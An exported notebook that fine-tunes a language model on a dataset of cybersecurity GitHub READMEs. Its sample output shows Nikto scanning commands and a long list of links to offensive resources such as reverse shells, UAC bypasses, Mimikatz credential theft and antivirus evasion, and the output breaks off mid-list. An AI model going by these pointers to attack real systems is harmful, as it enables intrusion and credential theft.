If you're opening this Notebook on colab, you will probably need to install 🤗 Transformers and 🤗 Datasets. Uncomment the following cell and run it.

In [1]:
!pip install datasets
!pip install transformers
!pip install accelerate -U
# Transformers installation
# To install from source instead of the last release, comment the command above and uncomment the following one.
! pip install git+https://github.com/huggingface/transformers.git

Collecting git+https://github.com/huggingface/transformers.git
  Cloning https://github.com/huggingface/transformers.git to /tmp/pip-req-build-8qt_lse5
  Running command git clone --filter=blob:none --quiet https://github.com/huggingface/transformers.git /tmp/pip-req-build-8qt_lse5
  Resolved https://github.com/huggingface/transformers.git to commit b109257f4fb8b1166e7c53cc5418632014ed53a5
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done


If you're opening this notebook locally, make sure your environment has the latest version of those libraries installed.

To be able to share your model with the community and generate results like the one shown in the picture below via the inference API, there are a few more steps to follow.

First you have to store your authentication token from the Hugging Face website (sign up [here](https://huggingface.co/join) if you haven't already!) then execute the following cell and input your username and password:

In [2]:
from huggingface_hub import notebook_login

notebook_login()


Then you need to install Git-LFS. Uncomment the following instructions:

In [3]:
!apt install git-lfs

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
git-lfs is already the newest version (3.0.2-1ubuntu0.2).
0 upgraded, 0 newly installed, 0 to remove and 45 not upgraded.


Make sure your version of Transformers is at least 4.11.0 since the functionality was introduced in that version:

In [4]:
import transformers

print(transformers.__version__)

4.40.0.dev0


You can find a script version of this notebook to fine-tune your model in a distributed fashion using multiple GPUs or TPUs [here](https://github.com/huggingface/transformers/tree/master/examples/language-modeling).

We also quickly upload some telemetry - this tells us which examples and software versions are getting used so we know where to prioritize our maintenance efforts. We don't collect (or care about) any personally identifiable information, but if you'd prefer not to be counted, feel free to skip this step or delete this cell entirely.

In [5]:
from transformers.utils import send_example_telemetry

send_example_telemetry("language_modeling_notebook", framework="pytorch")

# Fine-tuning a language model

In this notebook, we'll see how to fine-tune one of the [🤗 Transformers](https://github.com/huggingface/transformers) models on a language modeling task. We will cover two types of language modeling tasks:

- Causal language modeling: the model has to predict the next token in the sentence (so the labels are the same as the inputs shifted to the right). To make sure the model does not cheat, it gets an attention mask that prevents it from accessing the tokens after token i when trying to predict token i+1 in the sentence.

![Widget inference representing the causal language modeling task](images/causal_language_modeling.png)

- Masked language modeling: the model has to predict some tokens that are masked in the input. It still has access to the whole sentence, so it can use the tokens before and after the tokens masked to predict their value.

![Widget inference representing the masked language modeling task](images/masked_language_modeling.png)
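The two objectives above, worked through in plain Python as an added example that is not part of the original notebook: the causal attention mask with its next-token targets, and masked-LM inputs with their labels. The whitespace tokenizer, toy vocabulary, sample sentence and helper names are assumptions made for illustration, and the masking step always substitutes `[MASK]`, which is a simplification.

```python
import random

# Label value that PyTorch's cross-entropy loss skips by default (ignore_index).
IGNORE_INDEX = -100
MASK_ID = 0

# Constructed sample sentence (not taken verbatim from the dataset).
SAMPLE = "Nikto is an open source web server scanner"


def encode(text):
    """Toy whitespace tokenizer: returns (token ids, vocabulary)."""
    vocab = {"[MASK]": MASK_ID}
    ids = [vocab.setdefault(word, len(vocab)) for word in text.split()]
    return ids, vocab


def causal_mask(n):
    """mask[i][j] is True when position i may attend to position j (j <= i)."""
    return [[j <= i for j in range(n)] for i in range(n)]


def full_mask(n):
    """Bidirectional mask used for masked language modeling."""
    return [[True] * n for _ in range(n)]


def sees_future(mask):
    """True if any position can attend to a later position."""
    n = len(mask)
    return any(mask[i][j] for i in range(n) for j in range(i + 1, n))


def causal_lm_targets(token_ids):
    """Target at position i is token i+1; the last position has no target."""
    return token_ids[1:] + [IGNORE_INDEX]


def mask_for_mlm(token_ids, prob, rng, mask_id=MASK_ID):
    """Replace each token with mask_id with probability `prob`.

    Labels keep the original token only at masked positions, so the loss
    is computed on the hidden tokens and nowhere else.
    """
    inputs = list(token_ids)
    labels = [IGNORE_INDEX] * len(token_ids)
    for i, tok in enumerate(token_ids):
        if rng.random() < prob:
            inputs[i] = mask_id
            labels[i] = tok
    return inputs, labels


if __name__ == "__main__":
    ids, vocab = encode(SAMPLE)
    words = {i: w for w, i in vocab.items()}

    print("Causal LM: what each position sees and must predict")
    mask = causal_mask(len(ids))
    targets = causal_lm_targets(ids)
    for i, target in enumerate(targets):
        visible = [words[ids[j]] for j in range(len(ids)) if mask[i][j]]
        goal = words[target] if target != IGNORE_INDEX else "(no target)"
        print(f"  {' '.join(visible):45s} -> {goal}")
    print("  causal mask leaks future tokens:", sees_future(mask))

    print("Masked LM: whole sentence visible, some tokens hidden")
    inputs, labels = mask_for_mlm(ids, prob=0.3, rng=random.Random(0))
    print("  inputs:", " ".join(words[i] for i in inputs))
    print("  labels:", labels)
    print("  full mask leaks future tokens:", sees_future(full_mask(len(ids))))
```
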

We will see how to easily load and preprocess the dataset for each one of those tasks, and how to use the `Trainer` API to fine-tune a model on it.

A script version of this notebook you can directly run on a distributed environment or on TPU is available in our [examples folder](https://github.com/huggingface/transformers/tree/master/examples).

## Preparing the dataset

For each of those tasks, we will use the `CyberNative/github_cybersecurity_READMEs` dataset as an example. You can load it very easily with the 🤗 Datasets library.

In [6]:
from datasets import load_dataset
dataset = load_dataset("CyberNative/github_cybersecurity_READMEs")

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


You can replace the dataset above with any dataset hosted on [the hub](https://huggingface.co/datasets) or use your own files. Just uncomment the following cell and replace the paths with values that will lead to your files:

In [7]:
dataset["train"] = load_dataset("CyberNative/github_cybersecurity_READMEs", split='train[:80%]')
dataset["validation"] = load_dataset("CyberNative/github_cybersecurity_READMEs", split='train[80%:90%]')
dataset["test"] = load_dataset("CyberNative/github_cybersecurity_READMEs", split='train[90%:]')

You can also load datasets from a csv or a JSON file, see the [full documentation](https://huggingface.co/docs/datasets/loading_datasets.html#from-local-files) for more information.

To access an actual element, you need to select a split first, then give an index:

In [8]:
dataset["train"][10]



To get a sense of what the data looks like, the following function will show some examples picked randomly in the dataset.

In [9]:
from datasets import ClassLabel
import random
import pandas as pd
from IPython.display import display, HTML

def show_random_elements(dataset, num_examples=10):
    assert num_examples <= len(dataset), "Can't pick more elements than there are in the dataset."
    picks = []
    for _ in range(num_examples):
        pick = random.randint(0, len(dataset)-1)
        while pick in picks:
            pick = random.randint(0, len(dataset)-1)
        picks.append(pick)

    df = pd.DataFrame(dataset[picks])
    for column, typ in dataset.features.items():
        if isinstance(typ, ClassLabel):
            df[column] = df[column].transform(lambda i: typ.names[i])
    display(HTML(df.to_html()))

In [10]:
show_random_elements(dataset["train"])

Unnamed: 0,text
0,"## Description\n**Nikto** is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.\n\nNikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).\n\nNot every check is a security problem. There are some items that are ""info only"" type checks that look for things that may not have a security flaw, but Pentester may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.\n\nThe goal of the project is to examine a web server to find potential problems and security vulnerabilities, including:\n\n- Server and software misconfigurations\n- Default files and programs\n- Insecure files and programs\n- Outdated servers and programs\n- Pointers to lead a human tester to better manual testing\n\nNikto is built on LibWhisker2 (by Rain Forest Puppy) and can run on any platform which has a Perl environment. 
It supports SSL, proxies, host authentication, attack encoding and more.\n\n## Cheatsheet\n\n### To scan a particular host\n```\ndocker run -it --rm secsi/nikto -host <target_ip_address>\n```\n\n### To scan a host on multiple ports (default = 80)\n```\ndocker run -it --rm secsi/nikto -host <target_ip_address> -port [port number 1], [port number 2], [port number 3]\n```\n\n### To scan a host and output fingerprinted information to a file\n```\ndocker run -it --rm -v <output_dir>:/output secsi/nikto -host <target_ip_address> -output /output/<output_file>\n```\n\n### To use a proxy while scanning a host\n```\ndocker run -it --rm secsi/nikto -host <target_ip_address> -useproxy <proxy_address>\n```"
File:\n\n\nhttps://haiderm.com/fully-undetectable-backdooring-pe-file/\n\n-233-backdooring exe files:\n\n\nhttps://haiderm.com/tag/backdooring-exe-files/\n\n\n-234-From PHP (s)HELL to Powershell Heaven:\n\n\nhttps://medium.com/p/da40ce840da8\n\n\n-235-Forensic Investigation of Nmap Scan using Wireshark:\n\n\nhttp://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark\n\n\n-236-Unleashing an Ultimate XSS Polyglot:\n\n\nhttps://github.com/0xsobky/HackVault/wiki\n\n\n-237-wifi-arsenal:\n\n\nhttps://github.com/0x90/wifi-arsenal\n\n\n-238-XXE_payloads:\n\n\nhttps://gist.github.com/staaldraad/01415b990939494879b4\n\n\n-239-xss_payloads_2016:\n\n\nhttps://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016\n\n\n-240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.:\n\n\nhttps://github.com/alebcay/awesome-shell\n\n\n-241-The goal of this repository is to document the most common techniques to bypass AppLocker.:\n\n\nhttps://github.com/api0cradle/UltimateAppLockerByPassList\n\n\n-242-A curated list of CTF frameworks, libraries, resources and softwares:\n\n\nhttps://github.com/apsdehal/awesome-ctf\n\n\n-243-A collection of android security related resources:\n\n\nhttps://github.com/ashishb/android-security-awesome\n\n\n-244-OSX and iOS related security tools:\n\n\nhttps://github.com/ashishb/osx-and-ios-security-awesome\n\n\n-245-regexp-security-cheatsheet:\n\n\nhttps://github.com/attackercan/regexp-security-cheatsheet\n\n\n-246-PowerView-2.0 tips and tricks:\n\n\nhttps://gist.github.com/HarmJ0y/3328d954607d71362e3c\n\n\n-247-A curated list of awesome awesomeness:\n\n\nhttps://github.com/bayandin/awesome-awesomeness\n\n\n-248-Android App Security Checklist:\n\n\nhttps://github.com/b-mueller/android_app_security_checklist\n\n\n-249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and 
Aircrack-ng/Hashcat:\n\n\nhttps://github.com/brannondorsey/wifi-cracking\n\n\n-250-My-Gray-Hacker-Resources:\n\n\nhttps://github.com/bt3gl/My-Gray-Hacker-Resources\n\n\n-251-A collection of tools developed by other researchers in the Computer Science area to process network traces:\n\n\nhttps://github.com/caesar0301/awesome-pcaptools\n\n\n-252-A curated list of awesome Hacking tutorials, tools and resources:\n\n\nhttps://github.com/carpedm20/awesome-hacking\n\n\n-253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.:\n\n\nhttps://github.com/cn0xroot/RFSec-ToolKit\n\n\n-254-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-255-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-256-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-257-A curated list of awesome forensic analysis tools and resources:\n\n\nhttps://github.com/cugu/awesome-forensics\n\n\n-258-Open-Redirect-Payloads:\n\n\nhttps://github.com/cujanovic/Open-Redirect-Payloads\n\n\n-259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.:\n\n\nhttps://github.com/Cyb3rWard0g/ThreatHunter-Playbook\n\n\n-260-Windows memory hacking library:\n\n\nhttps://github.com/DarthTon/Blackbone\n\n\n-261-A collective list of public JSON APIs for use in security.:\n\n\nhttps://github.com/deralexxx/security-apis\n\n\n-262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.:\n\n\nhttps://github.com/devsecops/awesome-devsecops\n\n\n-263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi:\n\n\nhttps://github.com/diasdavid/awesome-hacking-spots\n\n\n-264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and 
Write-ups:\n\n\nhttps://github.com/djadmin/awesome-bug-bounty\n\n\n-265-Notes for taking the OSCP in 2097:\n\n\nhttps://github.com/dostoevskylabs/dostoevsky-pentest-notes\n\n\n-266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom:\n\n\nhttps://github.com/enddo/awesome-windows-exploitation\n\n\n-267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development:\n\n\nhttps://github.com/FabioBaroni/awesome-exploit-development\n\n\n-268-A curated list of awesome reversing resources:\n\n\nhttps://github.com/fdivrp/awesome-reversing\n\n\n-269-Git All the Payloads! A collection of web attack payloads:\n\n\nhttps://github.com/foospidy/payloads\n\n\n-270-GitHub Project Resource List:\n\n\nhttps://github.com/FuzzySecurity/Resource-List\n\n\n-271-Use your macOS terminal shell to do awesome things.:\n\n\nhttps://github.com/herrbischoff/awesome-macos-command-line\n\n\n-272-Defeating Windows User Account Control:\n\n\nhttps://github.com/hfiref0x/UACME\n\n\n-273-Free Security and Hacking eBooks:\n\nhttps://github.com/Hack-with-Github/Free-Security-eBooks\n\n\n-274-Universal Radio Hacker: investigate wireless protocols like a boss:\n\n\nhttps://github.com/jopohl/urh\n\n\n-275-A curated list of movies every hacker & cyberpunk must watch:\n\n\nhttps://github.com/k4m4/movies-for-hackers\n\n\n-276-Various public documents, whitepapers and articles about APT campaigns:\n\n\nhttps://github.com/kbandla/APTnotes\n\n\n-277-A database of common, interesting or useful commands, in one handy referable form:\n\n\nhttps://github.com/leostat/rtfm\n\n\n-278-A curated list of tools for incident response:\n\n\nhttps://github.com/meirwah/awesome-incident-response\n\n\n-279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys:\n\n\nhttps://github.com/meitar/awesome-lockpicking\n\n\n-280-A curated list of static 
analysis tools, linters and code quality checkers for various programming languages:\n\n\nhttps://github.com/mre/awesome-static-analysis\n\n\n-281-A Collection of Hacks in IoT Space so that we can address them (hopefully):\n\n\nhttps://github.com/nebgnahz/awesome-iot-hacks\n\n\n-281-A Course on Intermediate Level Linux Exploitation:\n\n\nhttps://github.com/nnamon/linux-exploitation-course\n\n\n-282-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-283-A curated list of awesome infosec courses and training resources.:\n\n\nhttps://github.com/onlurking/awesome-infosec\n\n\n-284-A curated list of resources for learning about application security:\n\n\nhttps://github.com/paragonie/awesome-appsec\n\n\n-285-an awesome list of honeypot resources:\n\n\nhttps://github.com/paralax/awesome-honeypots\n\n\n\n286-GitHub Enterprise SQL Injection:\n\n\nhttps://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493\n\n\n-287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis:\n\n\nhttps://github.com/secfigo/Awesome-Fuzzing\n\n\n-288-PHP htaccess injection cheat sheet:\n\n\nhttps://github.com/sektioneins/pcc/wiki\n\n\n-289-A curated list of the awesome resources about the Vulnerability Research:\n\n\nhttps://github.com/sergey-pronin/Awesome-Vulnerability-Research\n\n\n-290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF:\n\n\nhttps://github.com/swisskyrepo/PayloadsAllTheThings\n\n\n-291-A collection of Red Team focused tools, scripts, and notes:\n\n\nhttps://github.com/threatexpress/red-team-scripts\n\n\n-292-Awesome XSS stuff:\n\n\nhttps://github.com/UltimateHackers/AwesomeXSS\n\n\n-293-A collection of hacking / penetration testing resources to make you 
better!:\n\n\nhttps://github.com/vitalysim/Awesome-Hacking-Resources\n\n\n-294-Docker Cheat Sheet:\n\n\nhttps://github.com/wsargent/docker-cheat-sheet\n\n\n-295-Decrypted content of eqgrp-auction-file.tar.xz:\n\n\nhttps://github.com/x0rz/EQGRP\n\n\n-296-A bunch of links related to Linux kernel exploitation:\n\n\nhttps://github.com/xairy/linux-kernel-exploitation\n\n\n-297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet:\n\n\nwww.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet\n\n\n-298-Pentesting Cheatsheet:\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n-299-Windows Privilege Escalation Methods for Pentesters:\n\n\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n\n\n-300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:\n\n\n-301-Reading Your Way Around UAC (Part 1):\n\n\nhttps://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html\n\n\n\n-302--Reading Your Way Around UAC (Part 2):\n\n\nhttps://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html\n\n\n\n-303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2):\n\n\nhttps://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/\n\n\n-304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:\n\n\nhttps://medium.com/p/29d034c27978\n\n\n-304-Automating Cobalt Strike,Aggressor Collection Scripts:\n\n\n\nhttps://github.com/bluscreenofjeff/AggressorScripts\n\n\n\nhttps://github.com/harleyQu1nn/AggressorScripts\n\n\n-305-Vi Cheat Sheet:\n\n\nhttps://highon.coffee/blog/vi-cheat-sheet/\n\n\n-306-Network Recon Cheat Sheet:\n\n\nhttps://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/\n\n\n-307-LFI Cheat Sheet:\n\n\nhttps://highon.coffee/blog/lfi-cheat-sheet/\n\n\n-308-Systemd Cheat 
Sheet:\n\n\nhttps://highon.coffee/blog/systemd-cheat-sheet/\n\n\n-309-Aircrack-ng Cheatsheet:\n\n\nhttps://securityonline.info/aircrack-ng-cheatsheet/\n\n\n-310-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://www.blackmoreops.com/?p=7212\n\n\n\n-311-Wifi Pentesting Command Cheatsheet:\n\n\nhttps://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/\n\n\n-312-Android Testing Environment Cheatsheet (Part 1):\n\n\nhttps://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/\n\n\n-313-cheatsheet:\n\n\nhttps://randomkeystrokes.com/category/cheatsheet/\n\n\n-314-Reverse Shell Cheat Sheet:\n\n\nhttps://highon.coffee/blog/reverse-shell-cheat-sheet/\n\n\n-315-Linux Commands Cheat Sheet:\n\n\nhttps://highon.coffee/blog/linux-commands-cheat-sheet/\n\n\n-316-Linux Privilege Escalation using Sudo Rights:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights\n\n\n-317-Linux Privilege Escalation using Misconfigured NFS:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/\n\n\n-318-Linux Privilege Escalation by Exploiting Cronjobs:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/\n\n\n-319-Web Penetration Testing:\n\n\nhttp://www.hackingarticles.in/web-penetration-testing/\n\n\n-320-Webshell to Meterpreter:\n\n\nhttp://www.hackingarticles.in/webshell-to-meterpreter\n\n\n-321-WordPress Penetration Testing using WPScan & Metasploit:\n\n\nhttp://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit\n\n\n-322-XSS Exploitation in DVWA (Bypass All Security):\n\n\nhttp://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security\n\n\n-323-Linux Privilege Escalation Using PATH Variable:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/\n\n\n-324-VNC tunneling over SSH:\n\n\nhttp://www.hackingarticles.in/vnc-tunneling-ssh\n\n\n-325-VNC Pivoting through 
Meterpreter:\n\n\nhttp://www.hackingarticles.in/vnc-pivoting-meterpreter\n\n\n-326-Week of Evading Microsoft ATA - Announcement and Day 1:\n\n\nhttps://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html\n\n\n-327-Abusing DNSAdmins privilege for escalation in Active Directory:\n\n\nhttps://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html\n\n\n-328-Using SQL Server for attacking a Forest Trust:\n\n\nhttps://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html\n\n\n-329-Empire :\n\n\nhttp://www.harmj0y.net/blog/category/empire/\n\n\n-330-8 Deadly Commands You Should Never Run on Linux:\n\n\nhttps://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/\n\n\n-331-External C2 framework for Cobalt Strike:\n\n\nhttps://www.insomniacsecurity.com/2018/01/11/externalc2.html\n\n\n-332-How to use Public IP on Kali Linux:\n\n\nhttp://www.hackingarticles.in/use-public-ip-kali-linux\n\n\n-333-Bypass Admin access through guest Account in windows 10:\n\n\nhttp://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10\n\n\n-334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports):\n\n\nhttp://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports\n\n\n-335-Bypass SSH Restriction by Port Relay:\n\n\nhttp://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay\n\n\n-336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key):\n\n\nhttp://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key\n\n\n-337-Bypass UAC in Windows 10 using bypass_comhijack Exploit:\n\n\nhttp://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit\n\n\n-338-Bind Payload using SFX archive with Trojanizer:\n\n\nhttp://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer\n\n\n-339-Capture NTLM Hashes using PDF 
(Bad-Pdf):\n\n\nhttp://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf\n\n\n-340-Best of Post Exploitation Exploits & Tricks:\n\n\nhttp://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/\n\n\n-341-Detect SQL Injection Attack using Snort IDS:\n\n\nhttp://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/\n\n\n-342-Beginner Guide to Website Footprinting:\n\n\nhttp://www.hackingarticles.in/beginner-guide-website-footprinting/\n\n\n-343-How to Enable and Monitor Firewall Log in Windows PC:\n\n\nhttp://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/\n\n\n-344-Wifi Post Exploitation on Remote PC:\n\n\nhttp://www.hackingarticles.in/wifi-post-exploitation-remote-pc/\n\n\n-335-Check Meltdown Vulnerability in CPU:\n\n\nhttp://www.hackingarticles.in/check-meltdown-vulnerability-cpu\n\n\n-336-XXE:\n\n\nhttps://phonexicum.github.io/infosec/xxe.html\n\n\n-337-[XSS] Re ected XSS Bypass Filter:\n\n\nhttps://medium.com/p/de41d35239a3\n\n\n-338-Engagement Tools Tutorial in Burp suite:\n\n\nhttp://www.hackingarticles.in/engagement-tools-tutorial-burp-suite\n\n\n-339-Wiping Out CSRF:\n\n\nhttps://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f\n\n\n-340-First entry: Welcome and fileless UAC bypass:\n\n\nhttps://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n\n\n-341-Writing a Custom Shellcode Encoder:\n\n\nhttps://medium.com/p/31816e767611\n\n\n-342-Security Harden CentOS 7 :\n\n\nhttps://highon.coffee/blog/security-harden-centos-7/\n\n\n-343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS:\n\n\nhttps://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html\n\n\n-344-MySQL:\n\n\nhttps://websec.ca/kb/CHANGELOG.txt\n\n\n-345-Deobfuscation of VM based software protection:\n\n\nhttp://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf\n\n\n-346-Online Assembler and 
Disassembler:\n\n\nhttp://shell-storm.org/online/Online-Assembler-and-Disassembler/\n\n\n-347-Shellcodes database for study cases:\n\n\nhttp://shell-storm.org/shellcode/\n\n\n-348-Dynamic Binary Analysis and Obfuscated Codes:\n\n\nhttp://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf\n\n\n-349-How Triton may help to analyse obfuscated binaries:\n\n\nhttp://triton.quarkslab.com/files/misc82-triton.pdf\n\n\n-350-Triton: A Concolic Execution Framework:\n\n\nhttp://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf\n\n\n-351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM:\n\n\nhttps://github.com/JonathanSalwan/Tigress_protection\n\n\n-352-What kind of semantics information Triton can provide?:\n\n\nhttp://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/\n\n\n-353-Code coverage using a dynamic symbolic execution:\n\n\nhttp://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/\n\n\n-354-Triton (concolic execution framework) under the hood:\n\n\nhttp://triton.quarkslab.com/blog/first-approach-with-the-framework/\n\n\n-355-- Stack and heap overflow detection at runtime via behavior analysis and Pin:\n\n\nhttp://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/\n\n\n-356-Binary analysis: Concolic execution with Pin and z3:\n\n\nhttp://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/\n\n\n-357-In-Memory fuzzing with Pin:\n\n\nhttp://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/\n\n\n-358-Hackover 2015 r150 (outdated solving for Triton use cases):\n\n\nhttps://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py\n\n\n-359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell 
injection:\n\n\nhttps://gbhackers.com/skipfish-web-application-security-scanner\n\n\n-360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains:\n\n\nhttps://gbhackers.com/sublist3r-penetration-testers\n\n\n-361-bypassing application whitelisting with bginfo:\n\n\n\nhttps://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\n\n\n-362-accessing-clipboard-from-the-lock-screen-in-windows-10:\n\n\nhttps://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/\n\n\n-363-bypassing-device-guard-umci-using-chm-cve-2017-8625:\n\n\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\n\n\n-364-defense-in-depth-writeup:\n\n\nhttps://oddvar.moe/2017/09/13/defense-in-depth-writeup/\n\n\n-365-applocker-case-study-how-insecure-is-it-really-part-1:\n\n\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\n\n\n-366-empires-cross-platform-office-macro:\n\n\nhttps://www.blackhillsinfosec.com/empires-cross-platform-office-macro/\n\n\n-367-recon tools:\n\n\nhttps://blackarch.org/recon.html\n\n\n-368-Black Hat 2018 tools list:\n\n\nhttps://medium.com/p/991fa38901da\n\n\n-369-Application Introspection & Hooking With Frida:\n\n\nhttps://www.fuzzysecurity.com/tutorials/29.html\n\n\n-370-And I did OSCP!:\n\n\nhttps://medium.com/p/589babbfea19\n\n\n-371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests:\n\n\nhttps://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html\n\n\n-372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals:\n\n\nhttps://gbhackers.com/threat-intelligence-tools\n\n\n-373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:\n\n\nhttps://techincidents.com/penetration-testing-cheat-sheet/\n\n\n-374-privilege escalation:\n\n\nhttps://toshellandback.com/category/privilege-escalation/\n\n\n-375-The Complete List of Windows Post-Exploitation 
Commands (No Powershell):\n\n\nhttps://medium.com/p/999b5433b61e\n\n\n-376-The Art of Subdomain Enumeration:\n\n\nhttps://blog.sweepatic.com/tag/subdomain-enumeration/\n\n\n-377-The Principles of a Subdomain Takeover:\n\n\nhttps://blog.sweepatic.com/subdomain-takeover-principles/\n\n\n-378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!:\n\n\nhttps://medium.com/p/b250fb40af82\n\n\n-379-The Solution for Web for Pentester-I:\n\n\nhttps://medium.com/p/4c21b3ae9673\n\n\n-380-The Ultimate Penetration Testing Command Cheat Sheet for Linux:\n\n\nhttps://www.hackingloops.com/command-cheat-sheet-for-linux/\n\n\n-381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended:\n\n\nhttps://www.hackingloops.com/hacking-tricks/\n\n\n-383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology:\n\n\nhttps://www.hackingloops.com/exploitation-terminology/\n\n\n-384-How Hackers Kick Victims Off of Wireless Networks:\n\n\nhttps://www.hackingloops.com/kick-victims-off-of-wireless-networks/\n\n\n-385-Maintaining Access Part 1: Introduction and Metasploit Example:\n\n\nhttps://www.hackingloops.com/maintaining-access-metasploit/\n\n\n-386-How to Steal Windows Credentials with Mimikatz and Metasploit:\n\n\nhttps://www.hackingloops.com/mimikatz/\n\n\n-387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom:\n\n\nhttps://www.hackingloops.com/msfvenom/\n\n\n-388-Evading Anti-virus Part 1: Infecting EXEs with 